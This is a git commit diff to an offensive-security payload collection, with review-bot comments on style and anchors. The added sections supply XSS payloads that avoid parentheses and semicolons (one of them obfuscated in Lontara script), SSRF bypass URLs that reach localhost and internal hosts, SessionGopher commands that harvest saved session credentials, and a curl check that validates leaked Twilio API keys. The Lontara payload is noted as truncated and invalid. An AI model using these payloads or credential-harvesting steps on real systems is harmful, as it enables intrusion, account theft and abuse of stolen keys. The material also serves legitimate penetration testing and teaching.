XSS without parenthesis, semi-colon + Lontara
swisskyrepo committed May 15, 2019
1 parent cc8c7b3 commit 9c2e638
Showing 5 changed files with 92 additions and 16 deletions.
11 changes: 11 additions & 0 deletions Insecure Source Code Management/README.md
Expand Up @@ -15,6 +15,7 @@
- [BAZAAR - Source code management](#bazaar---source-code-management)
- [Automatic way : rip-bzr](#automatic-way--rip-bzr)
- [Automatic way : bzr_dumper](#automatic-way--bzr_dumper)
- [Leaked API keys](#leaked-api-keys)

## GIT - Source code management

Expand Down Expand Up @@ -236,6 +237,16 @@ $ bzr revert
N static/
```

## Leaked API keys

If you find any key , use the [keyhacks](https://github.com/streaak/keyhacks) from @streaak to verifiy them.

Twilio example :

```powershell
curl -X GET 'https://api.twilio.com/2010-04-01/Accounts/ACCOUNT_SID/Keys.json' -u ACCOUNT_SID:AUTH_TOKEN
```

## References

- [bl4de, hidden_directories_leaks](https://github.com/bl4de/research/tree/master/hidden_directories_leaks)
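Review bot: typo in the new `Leaked API keys` prose: "If you find any key , use ... to verifiy them" should read "If you find any key, use ... to verify them" (stray space before the comma, misspelt "verify"). Two smaller points on the Twilio block: the fence is tagged `powershell` but the command is a `curl` one-liner, so `bash` is the accurate tag; and once the `ACCOUNT_SID:AUTH_TOKEN` placeholders are filled in, the `-u` form puts the real secret on the command line and into shell history, so a short remark to read it from an environment variable (`-u "$ACCOUNT_SID:$AUTH_TOKEN"`) or run the check from a throwaway shell would help readers handle a found key carefully.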
1 change: 1 addition & 0 deletions Methodology and Resources/Active Directory Attack.md
Expand Up @@ -686,3 +686,4 @@ net group "Domain Admins" hacker2 /add /domain
* [Abusing Exchange: One API call away from Domain Admin - Dirk-jan Mollema](https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin)
* [Red Teaming Made Easy with Exchange Privilege Escalation and PowerPriv - Thursday, January 31, 2019 - Dave](http://blog.redxorblue.com/2019/01/red-teaming-made-easy-with-exchange.html)
* [Chump2Trump - AD Privesc talk at WAHCKon 2017 - @l0ss](https://github.com/l0ss/Chump2Trump/blob/master/ChumpToTrump.pdf)
* [Post-OSCP Series Part 2 - Kerberoasting - 16 APRIL 2019 - Jon Hickman](https://0metasecurity.com/post-oscp-part-2/)
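Review bot: style only: the new reference writes its date as `16 APRIL 2019` while the neighbouring entry uses `Thursday, January 31, 2019`; `16 April 2019` keeps the list consistent.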
13 changes: 13 additions & 0 deletions Methodology and Resources/Windows - Privilege Escalation.md
Expand Up @@ -320,6 +320,19 @@ Oneliner method to extract wifi passwords from all the access point.
cls & echo. & for /f "tokens=4 delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name=%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on
```

### Passwords stored in services

Saved session information for PuTTY, WinSCP, FileZilla, SuperPuTTY, and RDP using [SessionGopher](https://github.com/Arvanaghi/SessionGopher)


```powershell
https://raw.githubusercontent.com/Arvanaghi/SessionGopher/master/SessionGopher.ps1
Import-Module path\to\SessionGopher.ps1;
Invoke-SessionGopher -AllDomain -o
Invoke-SessionGopher -AllDomain -u domain.com\adm-arvanaghi -p s3cr3tP@ss
```


## EoP - Processes Enumeration and Tasks

What processes are running?
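Review bot: the first line inside the new `Passwords stored in services` fence is a bare URL (`https://raw.githubusercontent.com/Arvanaghi/SessionGopher/master/SessionGopher.ps1`) with no command around it, so it is not something a reader can paste; either move it into the prose sentence as the download link or prefix it with the download step (for example `Invoke-WebRequest -Uri <url> -OutFile SessionGopher.ps1`) ahead of the `Import-Module` line. Also, `-u domain.com\adm-arvanaghi -p s3cr3tP@ss` are the tool author's own README example values; obvious placeholders such as `<domain>\<user>` and `<password>` avoid readers mistaking them for required input. Minor: the double blank lines above and below the block can be reduced to one.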
58 changes: 42 additions & 16 deletions Server Side Request Forgery/README.md
Expand Up @@ -7,6 +7,19 @@
* [Tools](#tools)
* [Payloads with localhost](#payloads-with-localhost)
* [Bypassing filters](#bypassing-filters)
* [Bypass using HTTPS](#bypass-using-https)
* [Bypass localhost with [::]](#bypass-localhost-with----)
* [Bypass localhost with a domain redirection](#bypass-localhost-with-a-domain-redirection)
* [Bypass localhost with CIDR](#bypass-localhost-with-cidr)
* [Bypass using a decimal IP location](#bypass-using-a-decimal-ip-location)
* [Bypass using IPv6/IPv4 Address Embedding](#bypass-using-ipv6-ipv4-address-embedding)
* [Bypass using malformed urls](#bypass-using-malformed-urls)
* [Bypass using rare address](#bypass-using-rare-address)
* [Bypass using bash variables](#bypass-using-bash-variables)
* [Bypass using tricks combination](#bypass-using-tricks-combination)
* [Bypass using enclosed alphanumerics](#bypass-using-enclosed-alphanumerics)
* [Bypass filter_var() php function](#bypass-filter-var-php-function)
* [Bypass against a weak parser](#bypass-against-a-weak-parser)
* [SSRF exploitation via URL Scheme](#ssrf-exploitation-via-url-scheme)
* [file://](#file)
* [http://](#http)
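Review bot: three of the new table-of-contents anchors do not look like the slugs GitHub generates for their headings, so they will probably not jump anywhere. GitHub lowercases the heading, drops punctuation other than hyphens and underscores, and turns each space into a hyphen (the `#automatic-way--bzr_dumper` entry in the Insecure Source Code Management README above follows that rule), which gives `#bypass-localhost-with-` for `Bypass localhost with [::]` (not `#bypass-localhost-with----`), `#bypass-using-ipv6ipv4-address-embedding` for `Bypass using IPv6/IPv4 Address Embedding` (the slash is dropped, not turned into a hyphen), and `#bypass-filter_var-php-function` for `Bypass filter_var() php function` (the underscore survives). Worth clicking each link on the rendered page before merging.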
Expand All @@ -15,7 +28,7 @@
* [tftp://](#tftp)
* [ldap://](#ldap)
* [gopher://](#gopher)
* [SSRF to XSS](#ssrf-to-xss-by-d0rkerdevil--alyssaoherrera)
* [SSRF to XSS](#ssrf-to-xss)
* [SSRF URL for Cloud Instances](#ssrf-url-for-cloud-instances)
* [SSRF URL for AWS Bucket](#ssrf-url-for-aws-bucket)
* [SSRF URL for AWS Elastic Beanstalk](#ssrf-url-for-aws-elastic-beanstalk)
Expand Down Expand Up @@ -75,14 +88,14 @@ Using this vulnerability users can upload images from any image URL = trigger an

## Bypassing filters

Bypass using HTTPS
### Bypass using HTTPS

```powershell
https://127.0.0.1/
https://localhost/
```

Bypass localhost with [::]
### Bypass localhost with [::]

```powershell
http://[::]:80/
Expand All @@ -98,7 +111,7 @@ http://0000::1:22/ SSH
http://0000::1:3128/ Squid
```

Bypass localhost with a domain redirecting to locahost
### Bypass localhost with a domain redirection

```powershell
http://localtest.me
Expand All @@ -113,16 +126,17 @@ The service nip.io is awesome for that, it will convert any ip address as a dns.
NIP.IO maps <anything>.<IP Address>.nip.io to the corresponding <IP Address>, even 127.0.0.1.nip.io maps to 127.0.0.1
```

Bypass localhost with CIDR : 127.x.x.x
### Bypass localhost with CIDR

It's a /8

```powershell
it's a /8
http://127.127.127.127
http://127.0.1.3
http://127.0.0.0
```

Bypass using a decimal ip location
### Bypass using a decimal IP location

```powershell
http://0177.0.0.1/
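Review bot: the `It's a /8` line that moved out of the CIDR code block now stands alone under a heading that lost the `127.x.x.x` detail the old heading carried, so a reader no longer sees which /8 is meant. Suggest a full sentence in its place, such as `127.0.0.0/8 is the loopback range, so any 127.x.x.x address reaches localhost`.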
Expand All @@ -131,35 +145,41 @@ http://3232235521/ = http://192.168.0.1
http://3232235777/ = http://192.168.1.1
```

Bypass using [IPv6/IPv4 Address Embedding](http://www.tcpipguide.com/free/t_IPv6IPv4AddressEmbedding.htm)
### Bypass using IPv6/IPv4 Address Embedding

[IPv6/IPv4 Address Embedding](http://www.tcpipguide.com/free/t_IPv6IPv4AddressEmbedding.htm)

```powershell
http://[0:0:0:0:0:ffff:127.0.0.1]
```

Bypass using malformed urls
### Bypass using malformed urls

```powershell
localhost:+11211aaa
localhost:00011211aaaa
```

Bypass using rare address, you can short-hand IP addresses by dropping the zeros
### Bypass using rare address

You can short-hand IP addresses by dropping the zeros

```powershell
http://0/
http://127.1
http://127.0.1
```

Bypass using bash variables (curl only)
### Bypass using bash variables

(curl only)

```powershell
curl -v "http://evil$google.com"
$google = ""
```

Bypass using tricks combination
### Bypass using tricks combination

```powershell
http://1.1.1.1 &@2.2.2.2# @3.3.3.3/
Expand All @@ -168,7 +188,9 @@ requests + browsers : 2.2.2.2
urllib : 3.3.3.3
```

Bypass using enclosed alphanumerics [@EdOverflow](https://twitter.com/EdOverflow)
### Bypass using enclosed alphanumerics

[@EdOverflow](https://twitter.com/EdOverflow)

```powershell
http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ = example.com
Expand All @@ -177,13 +199,15 @@ List:
① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿
```

Bypass filter_var() php function
### Bypass filter_var() php function

```powershell
0://evil.com:80;http://google.com:80/
```

Bypass against a weak parser - by Orange Tsai ([Blackhat A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf](https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf))
### Bypass against a weak parser

by Orange Tsai ([Blackhat A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf](https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf))

```powershell
http://127.1.1.1:80\@127.2.2.2:80/
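Review bot: splitting the old one-line headings into `###` headings has left several fragments standing on their own line that no longer read as sentences: `(curl only)` under `Bypass using bash variables`, the bare `[@EdOverflow](...)` under `Bypass using enclosed alphanumerics`, and `by Orange Tsai (...)` under `Bypass against a weak parser`. Suggest `This only works when the request is issued through curl.`, `Credit: [@EdOverflow](...)` and `Technique by Orange Tsai (...)` so each heading is followed by a complete sentence. Minor: `Bypass using malformed urls` and `Bypass using rare address` read better as `URLs` and `rare addresses`, but the TOC anchors added earlier in this diff would have to change with them.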
Expand Down Expand Up @@ -317,7 +341,9 @@ Content of evil.com/redirect.php:
?>
```

## SSRF to XSS by [@D0rkerDevil & @alyssa.o.herrera](https://medium.com/@D0rkerDevil/how-i-convert-ssrf-to-xss-in-a-ssrf-vulnerable-jira-e9f37ad5b158)
## SSRF to XSS

by [@D0rkerDevil & @alyssa.o.herrera](https://medium.com/@D0rkerDevil/how-i-convert-ssrf-to-xss-in-a-ssrf-vulnerable-jira-e9f37ad5b158)

```bash
http://brutelogic.com.br/poc.svg -> simple alert
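Review bot: same pattern as the other heading splits in this file: `by [@D0rkerDevil & @alyssa.o.herrera](...)` is a lowercase fragment on its own line under `## SSRF to XSS`; `Credit: [@D0rkerDevil & @alyssa.o.herrera](...)` reads as a sentence. The renamed heading does match the updated `#ssrf-to-xss` TOC entry earlier in this diff, so that anchor is consistent.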
25 changes: 25 additions & 0 deletions XSS Injection/README.md
Expand Up @@ -28,6 +28,7 @@ Cross-site scripting (XSS) is a type of computer security vulnerability typicall
- [Bypass quotes in mousedown event](#bypass-quotes-in-mousedown-event)
- [Bypass dot filter](#bypass-dot-filter)
- [Bypass parenthesis for string](#bypass-parenthesis-for-string)
- [Bypass parenthesis and semi colon](#bypass-parenthesis-and-semi-colon)
- [Bypass onxxxx= blacklist](#bypass-onxxxx---blacklist)
- [Bypass space filter](#bypass-space-filter)
- [Bypass email filter](#bypass-email-filter)
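Review bot: the commit title spells it `semi-colon` while the new TOC entry (and the heading it points to) use `semi colon`; pick one, and if the heading becomes `Bypass parenthesis and semi-colon` this anchor must change to `#bypass-parenthesis-and-semi-colon` to match.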
Expand All @@ -39,6 +40,7 @@ Cross-site scripting (XSS) is a type of computer security vulnerability typicall
- [Bypass ";" using another character](#bypass-using------using-another-character)
- [Bypass using HTML encoding](#bypass-using-html-encoding)
- [Bypass using Katana](#bypass-using-katana)
- [Bypass using Lontara](#bypass-using-lontara)
- [Bypass using ECMAScript6](#bypass-using-ecmascript6)
- [Bypass using Octal encoding](#bypass-using-octal-encoding)
- [Bypass using Unicode](#bypass-using-unicode)
Expand Down Expand Up @@ -525,6 +527,21 @@ alert`1`
setTimeout`alert\u0028document.domain\u0029`;
```

### Bypass parenthesis and semi colon

```javascript
// From @garethheyes
<script>onerror=alert;throw 1337</script>
<script>{onerror=alert}throw 1337</script>
<script>throw onerror=alert,'some string',123,'haha'</script>
// From @terjanq
<script>throw/a/,Uncaught=1,g=alert,a=URL+0,onerror=eval,/1/g+a[12]+[1337]+a[13]</script>
// From @cgvwzq
<script>TypeError.prototype.name ='=/',0[onerror=eval]['/-alert(1)//']</script>
```

### Bypass onxxxx= blacklist

```javascript
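Review bot: the new `Bypass parenthesis and semi colon` block is fenced as `javascript` but its lines are full `<script>...</script>` elements with `// From @...` attributions between them; pasted as-is into a page, those `//` lines are rendered as visible text rather than treated as comments. Either fence it as `html` and write the credits as `<!-- From @garethheyes -->`, or keep only the JavaScript inside the fence and move the credits into prose. Spelling: `semi colon` in the heading should match the commit title's `semi-colon`.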
Expand Down Expand Up @@ -704,6 +721,14 @@ Using the [Katakana](https://github.com/aemkei/katakana.js) library.
javascript:([,ウ,,,,ア]=[]+{},[ネ,ホ,ヌ,セ,,ミ,ハ,ヘ,,,ナ]=[!!ウ]+!+ウ.ウ)[ツ=++++++++++ホ][ツ](ミ+++++'(-~ウ)')()
```
### Bypass using Lontara
```javscript
='',ᨊ=!+ᨆ,ᨎ=!+ᨆ,ᨂ=+{},ᨇ=ᨊ[ᨆ++],ᨋ=ᨊ[ᨏ=ᨆ],ᨃ=+++ᨆ,ᨅ=ᨂ[ᨏ+ᨃ],ᨊ[ᨅ+=ᨂ[ᨆ]+(ᨊ.ᨎ+ᨂ)[ᨆ]+ᨎ[ᨃ]+++ᨊ[ᨏ]+++ᨂ[ᨆ]+ᨋ][ᨅ](ᨎ[ᨆ]+ᨎ[ᨏ]+ᨊ[ᨃ]+++"(ᨆ)")()
```
More alphabets on http://aem1k.com/aurebesh.js/#
### Bypass using ECMAScript6
```html
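Review bot: the Lontara payload looks truncated: `ᨆ` is read in `!+ᨆ`, `ᨆ++`, `ᨏ=ᨆ` and `ᨂ[ᨆ]` but the line opens with `='',` and never assigns it, so the leading identifier (most likely `ᨆ=''`) was lost when the payload was pasted; as written the line is not valid JavaScript at all because it begins with `=`. Please re-check it against the source before merging. Also the fence is tagged `javscript` (missing the `a`), which disables highlighting, and a blank line before the fence and before `### Bypass using ECMAScript6` would match the spacing used elsewhere in the file.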